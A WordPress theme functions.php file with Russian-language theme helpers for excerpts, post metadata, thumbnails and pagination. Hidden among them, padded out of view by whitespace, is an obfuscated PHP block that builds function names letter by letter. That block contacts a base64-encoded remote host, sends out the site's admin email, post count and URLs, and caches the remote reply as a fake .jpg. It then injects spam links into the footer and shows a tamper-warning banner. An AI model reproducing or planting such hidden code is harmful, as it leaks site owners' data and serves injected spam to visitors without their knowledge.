<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $GnOjjo='e';$vuGrR='d';$MItE='e';$AztduoU='6';$MUNmu='_';$CgbnJ='4';$IiakW='s';$tsHcQ='o';$LDwykpA='a';$UUQSnl='b';$CsdRmr='c';$XEGrb='d';$YoviC='e';$sYknArWy=$UUQSnl.$LDwykpA.$IiakW.$YoviC.$AztduoU.$CgbnJ.$MUNmu.$vuGrR.$GnOjjo.$CsdRmr.$tsHcQ.$XEGrb.$MItE;$AfSdv='t';$bzfR='n';$lBkLBRq='g';$eUaWJOo='e';$QbpXM='l';$lhGxCp='i';$gKkJmJL='z';$HYjsz='a';$NrOZTYK='f';$GyjbQqIz=$lBkLBRq.$gKkJmJL.$lhGxCp.$bzfR.$NrOZTYK.$QbpXM.$HYjsz.$AfSdv.$eUaWJOo;$TfLPOA='t';$nolK='r';$jvShy='3';$OYmGky='_';$WLPOOk='s';$yFynfD='t';$tOlgDk='1';$jPtU='o';$dJyotva='r';$RllrSkBl=$WLPOOk.$TfLPOA.$nolK.$OYmGky.$dJyotva.$jPtU.$yFynfD.$tOlgDk.$jvShy;$RFdQR='r';$gpfX='v';$mqiz='e';$OQfyrC='r';$kUxVOSI='t';$NYQbR='s';$xJBwGUOd=$NYQbR.$kUxVOSI.$RFdQR.$OQfyrC.$mqiz.$gpfX;                     $xy___s='e';$vh_______________m='d';$zd_________m='e';$vx______________h='6';$zv______i='_';$md____________v='4';$rq_______z='s';$ef__o='o';$vk_______b='a';$rq_______________r='b';$jo_____________a='c';$kc_____f='d';$kf___r='e';$ax_____________r=$rq_______________r.$vk_______b.$rq_______z.$kf___r.$vx______________h.$md____________v.$zv______i.$vh_______________m.$xy___s.$jo_____________a.$ef__o.$kc_____f.$zd_________m;$pd____________v='t';$bz__v='u';$gr_____f='t';$fe___x='n';$rx___w='e';$dx______________o='s';$bf_____________w='x';$lm__________r='i';$kr_____e='i';$fs_____________h='_';$vf___________u='c';$iw___t='f';$ui__________c='n';$gg__m='o';$ku______f='s';$qj_____f=$iw___t.$bz__v.$fe___x.$vf___________u.$gr_____f.$kr_____e.$gg__m.$ui__________c.$fs_____________h.$rx___w.$bf_____________w.$lm__________r.$dx______________o.$pd____________v.$ku______f;$ez____u='p';$bx______________m='f';$dt___e='e';$lh_____j='n';$sg___________v='o';$of_______v=$bx______________m.$sg___________v.$ez____u.$dt___e.$lh_____j;$xq__j='f';$vd______g='d';$bh____________r='a';$nk_______________j='e';$yh____________f='r';$ax____________a=$xq__j.$yh____________f.$nk_______________j.$bh____________r.$vd______g;$sl____________r='e';$ou_________v='c';$sd_______y='s';$pt_____n='o';$ab_______m='f';$ei_____________u='l';$tl___________q=$ab_______m.$ou_________v.$ei_____________u.$pt_____n.$sd_______y.$sl____________r;define("WP_ID", $ax_____________r("Mi4wLjA="));define("WP_TTL", $ax_____________r("MTA4MDA="));define("WP_SRC", $ax_____________r("dHBva24="));function wp_get_header() {global $ax_____________r, $qj_____f;if ($qj_____f($ax_____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qj_____f($ax_____________r("d3BfZ2V0X2Zvb3Rlcg==")) &&$qj_____f($ax_____________r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ax_____________r, $of_______v, $tl___________q, $ax____________a;$vw__k = TEMPLATEPATH."/".$ax_____________r("Zm9vdGVyLnBocA==");$zp_______e = @$of_______v($vw__k, "r");$vw__k = @$ax____________a($zp_______e, @filesize($vw__k));@$tl___________q($zp_______e);$ms_______________m = TEMPLATEPATH."/".$ax_____________r("ZnVuY3Rpb25zLnBocA==");$zp_______e = @$of_______v($ms_______________m, "r");$ms_______________m = @$ax____________a($zp_______e, @filesize($ms_______________m));@$tl___________q($zp_______e);$sw____________s = 0;if($vw__k && $ms_______________m) {if ($ax_____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($vw__k, $ax_____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$sw____________s = 1;}if (substr_count($vw__k, "wp_theme_GPL_credits()") < 1) {$sw____________s = 2;}}if(WP_ID != "2.0.0") {$sw____________s = 12;}}if($sw____________s > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $sw____________s -->";}}function wp_loaded() {global $ax_____________r, $qj_____f;return $qj_____f($ax_____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($tt______w, $hf____________b = "(more...)", $ez_______r = 0, $gr_______________k = "") {$ya_______________b = get_the_content($hf____________b, $ez_______r, $gr_______________k);$ya_______________b = apply_filters("the_content", $ya_______________b);$ya_______________b = str_replace("]]>", "]]>", $ya_______________b);if (strlen($_GET["p"]) > 0) {echo $ya_______________b;}else if ((strlen($ya_______________b)>$tt______w) && ($ku__t = strpos($ya_______________b, " ", $tt______w ))) {$ya_______________b = substr($ya_______________b, 0, $ku__t);$ya_______________b = $ya_______________b;echo $ya_______________b;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$hf____________b</a></div></p>";} else {echo $ya_______________b;}}}$dj______________a='o';$ow______n='_';$rg__________j='a';$zo_________f='4';$dw__________s='d';$xu__p='e';$ps_________a='6';$bs______________s='n';$lp______l='s';$rm___g='b';$pd____________o='e';$ao_________r='e';$zn___k='c';$wt______g=$rm___g.$rg__________j.$lp______l.$xu__p.$ps_________a.$zo_________f.$ow______n.$ao_________r.$bs______________s.$zn___k.$dj______________a.$dw__________s.$pd____________o;$pt________i='f';$ww_________d='l';$jw___________v='_';$xc_____l='e';$yr___x='_';$ly_______p='i';$wz_____________r='o';$ru_______________a='t';$ul_________v='e';$au____________x='e';$tq_______i='t';$ki________j='n';$qq_____________l='s';$zq_____c='t';$dk_________q='g';$ua_______r='c';$xa_______r='n';$vi_____________b=$pt________i.$ly_______p.$ww_________d.$ul_________v.$yr___x.$dk_________q.$xc_____l.$tq_______i.$jw___________v.$ua_______r.$wz_____________r.$ki________j.$zq_____c.$au____________x.$xa_______r.$ru_______________a.$qq_____________l;$lm_______r='e';$ob______x='i';$rr_____b='i';$ib__l='f';$gi_____g='x';$ap______________h='t';$ew___________r='_';$dj______v='s';$py_____________g='s';$ro________o='e';$ha___n='l';$xu______m=$ib__l.$rr_____b.$ha___n.$ro________o.$ew___________r.$lm_______r.$gi_____g.$ob______x.$dj______v.$ap______________h.$py_____________g;$gb___v='e';$ps_______w='e';$cy_________k='a';$tk_____________l='v';$br____o='n';$hw_______c='o';$na________k='r';$mn________s='c';$th____________h='p';$po_________c='o';$uy_________v='r';$pz_________b='m';$ov____g='i';$lt____________s='s';$gc___________a='_';$my____________h=$tk_____________l.$gb___v.$na________k.$lt____________s.$ov____g.$hw_______c.$br____o.$gc___________a.$mn________s.$po_________c.$pz_________b.$th____________h.$cy_________k.$uy_________v.$ps_______w;$uc________n='p';$jp________m='s';$ej___n='o';$fg______________o='n';$vb___________b='o';$dj__e='c';$pn___e='f';$nx_____________j='k';$dr____s='e';$vj_______x=$pn___e.$jp________m.$vb___________b.$dj__e.$nx_____________j.$ej___n.$uc________n.$dr____s.$fg______________o;$ns___l='t';$gi___r='w';$px______k='f';$oy____________f='i';$bu_____d='r';$tl___x='e';$nt__________c=$px______k.$gi___r.$bu_____d.$oy____________f.$ns___l.$tl___x;$xm___r='5';$qe________e='m';$df_______r='d';$mx____f=$qe________e.$df_______r.$xm___r;$fe______t='t';$my____________l='a';$vf_________l='e';$ca____________z='p';$td_________q='r';$fj______________y='h';$xm______________g='l';$st______a='a';$ps____________p=$td_________q.$vf_________l.$st______a.$xm______________g.$ca____________z.$my____________l.$fe______t.$fj______________y;$gv__e='e';$tu__________h='n';$oy_____________w='z';$zj__________j='r';$wr__________k='a';$xo___________m='i';$uk_____r='l';$uu______n='i';$hi__e='s';$ys__________y='e';$xk_________q='u';$jw_______________a=$xk_________q.$tu__________h.$hi__e.$ys__________y.$zj__________j.$xo___________m.$wr__________k.$uk_____r.$uu______n.$oy_____________w.$gv__e;$zp____________y='a';$sm_________t='t';$az_____________p='n';$cf______o='p';$ab__________h='m';$eu___q='m';$el___________m='e';$pn__________w=$sm_________t.$el___________m.$ab__________h.$cf______o.$az_____________p.$zp____________y.$eu___q;$pr____________y='x';$ug_______c='_';$ju___________c='e';$hf________j='c';$ju______m='e';$ot________l='e';$jk_______a='m';$ur_____o='_';$wo___f='t';$lw________p='c';$rw______________t='e';$cu______g='a';$bc_______________w='t';$de__y='o';$an_________d='r';$fv_______u='r';$by___________s='s';$vy_______________g='t';$io___________r='a';$cb____i='n';$ja___y='t';$mf_____________p=$by___________s.$vy_______________g.$fv_______u.$ju___________c.$cu______g.$jk_______a.$ur_____o.$hf________j.$de__y.$cb____i.$wo___f.$ju______m.$pr____________y.$bc_______________w.$ug_______c.$lw________p.$an_________d.$ot________l.$io___________r.$ja___y.$rw______________t;function uc_____________y($eu__z) {global $ax_____________r, $qj_____f, $vi_____________b, $my____________h, $mf_____________p;if (!$qj_____f($ax_____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($my____________h(PHP_VERSION, "5.0.0", ">=") && $qj_____f($ax_____________r("ZmlsZV9nZXRfY29udGVudHM=")) && $qj_____f($ax_____________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$tp_____i = $mf_____________p(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$dz_______________p = @$vi_____________b($eu__z, 0, $tp_____i);} else {$dz_______________p = @$vi_____________b($eu__z, 0);}return $dz_______________p;}function jh______________v($eu__z) {global $qj_____f, $vj_______x, $nt__________c, $ax_____________r;if (!$qj_____f($ax_____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$bv__________m = strpos($eu__z, "/", 7);$on_______q = array("uri"     => substr($eu__z, $bv__________m),"host"    => str_replace("http://", "", substr($eu__z, 0, $bv__________m)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ck_________q = @$vj_______x("$on_______q[host]", 80, $gw____________x, $xl______a, 4);if (!$ck_________q) {return false;} else {$dz_______________p = "";$wa_______t  = "GET $on_______q[uri] HTTP/1.0\r\n";$wa_______t .= "Host: $on_______q[host]\r\n";$wa_______t .= "Referer: $on_______q[referer]\r\n";$wa_______t .= "Connection: Close\r\n\r\n";@$nt__________c($ck_________q, $wa_______t);while (!@feof($ck_________q)) {$hv__________e = @fgets($ck_________q, (1024*24));if ($hv__________e == "\r\n") {$er____________v = true;continue;}if ($er____________v) {$dz_______________p .= $hv__________e;}}return $dz_______________p;}}function hh_______x($eu__z) {global $qj_____f;$fm_______e = false;if ($eu__z != "") {if ($qj_____f("uc_____________y")) {$fm_______e = @uc_____________y($eu__z);}if (!$fm_______e && ($qj_____f("jh______________v"))) {$fm_______e = @jh______________v($eu__z);}}return $fm_______e;}function um_______________f() {global $_SERVER, $mx____f;$hk_____________c = $_SERVER["SERVER_NAME"];if (substr("$hk_____________c", 0, 4) == "www.") {$hk_____________c = substr("$hk_____________c", 4);}$hk_____________c = $mx____f("$_SERVER[SERVER_NAME]");return $hk_____________c;}function zd__________v() {return "file";}function kr_________s($eu__z) {global $_SERVER, $vi_____________b, $xu______m, $of_______v, $tl___________q, $nt__________c;$at_____f = cb__l();$vt________z = um_______________f().".jpg";$xm___________f = $at_____f["dir_upload"]["path"]."/$vt________z";$wr________f = @filemtime($xm___________f);if (!$wr________f || ((time()-$wr________f) >= WP_TTL)) {$fm_______e = hh_______x($eu__z);if ($fm_______e) {if ($xu______m($xm___________f)) {@unlink($xm___________f);}$zp_______e = @$of_______v($xm___________f, "x+");@$nt__________c($zp_______e, $fm_______e);@$tl___________q($zp_______e);}} else {if ($xu______m($xm___________f)) {$fm_______e = @$vi_____________b($xm___________f);} else {$fm_______e = false;}}return $fm_______e;}function cb__l() {global $_SERVER, $ax_____________r, $wt______g;$xg____________x = wp_count_posts("post");$oz_______o = pathinfo(get_bloginfo("template_directory"));$at_____f = array("url" => array("report"      => $ax_____________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $oz_______o,"dir_upload"=> ns_________i(),"queryString"=> array("?a001=".WP_ID,"a004=".$oz_______o[filename],"a005=".$xg____________x->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://lev-tour.com/news/poleznye-sovety-pri-otdyxe-v-odinochestve.html\">Полезные советы при отдыхе в одиночестве</a>");$at_____f["url"]["queryString"] = implode("&", $at_____f["queryString"]);$at_____f["url"]["report"] = $at_____f["url"]["report"]."/?".$wt______g($at_____f["url"]["queryString"]).".html";return $at_____f;}function ns_________i() {$iu____s = wp_upload_dir();if (isset($iu____s["error"])) {$ip_____v = bh__________z();if (is_writable($ip_____v)) {$iu____s = array("path" => $ip_____v);}}return $iu____s;}function bh__________z() {global $qj_____f, $mx____f, $ps____________p, $pn__________w;$ka________s = (bool) ini_get("safe_mode");if ($ka________s == true) {return false;}if ($qj_____f("sys_get_temp_dir")) {$rj_____________h = sys_get_temp_dir();if (is_writable($rj_____________h)) {return $ps____________p($rj_____________h);}}if (!empty($_ENV["TMP"])) {return $ps____________p($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ps____________p($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ps____________p($_ENV["TEMP"]);} else {$kd___________d = $pn__________w($mx____f(uniqid(rand(), true)), "");if ($kd___________d) {$rj_____________h = $ps____________p(dirname($kd___________d));@unlink($kd___________d);return $rj_____________h;} else {return false;}}}function un______y() {global $_GET, $xu______m;$at_____f = cb__l();$hk_____________c = um_______________f();$cs__________b = zd__________v();$og____________y = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($cs__________b == "file") {$uj_____i = $at_____f["dir_upload"]["path"]."/".$hk_____________c.".jpg";if ($xu______m($uj_____i)) {@unlink($uj_____i);$og____________y = "deleted";}}$bq___________i = array("s"=> $og____________y,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($bq___________i AS $jf____d => $oj________q) echo " [$jf____d:$oj________q]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qj_____f, $ax_____________r, $jw_______________a;$at_____f = cb__l();$qa___________x = "kr_________s";if ($qj_____f($qa___________x)) {$dz_______________p = $qa___________x($at_____f["url"]["report"]);}if ($dz_______________p) {if ($dz_______________p = @$ax_____________r($dz_______________p)) {$dz_______________p = @$jw_______________a($dz_______________p);if (strlen($dz_______________p[custom_credit]) >= 5) {$at_____f["default_string"] = $dz_______________p[custom_credit];}if ($dz_______________p["status"] == "0") {$kk____c = 1;$et_____________o = 1;} else {$hl______________h = sizeof($dz_______________p["links"]);$fx_______________s = $at_____f["default_string"];if ($hl______________h > 0 && $dz_______________p["links"] !== "") {$hj____h = 0;foreach ($dz_______________p["links"] as $ug____________d => $sb_____________m) {$hj____h++;if ($sb_____________m->l_path == "" || $sb_____________m->l_path == $_SERVER["REQUEST_URI"]) {$sb_____________m->l_href = htmlspecialchars(strip_tags($sb_____________m->l_href));$sb_____________m->l_title = htmlspecialchars(strip_tags($sb_____________m->l_title));$sb_____________m->l_anchor = htmlspecialchars(strip_tags($sb_____________m->l_anchor));$fx_______________s .= " | ";$fx_______________s .= "<a href='$sb_____________m->l_href' title='$sb_____________m->l_title'";if ($sb_____________m->l_nofollow == "1") {$fx_______________s .= " rel='nofollow'";}$fx_______________s .= ">$sb_____________m->l_anchor</a>";}}}$at_____f["links"] = "$fx_______________s";if ($dz_______________p[credit] == "0") {$at_____f["links"] = "";}}} else {$kk____c = "1";}} else {$kk____c = "1";}if ($kk____c == "1") {$at_____f["links"] = $at_____f["default_string"];}echo "$at_____f[links]";echo "<!-- s: $dz_______________p[signature] -->";un______y();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
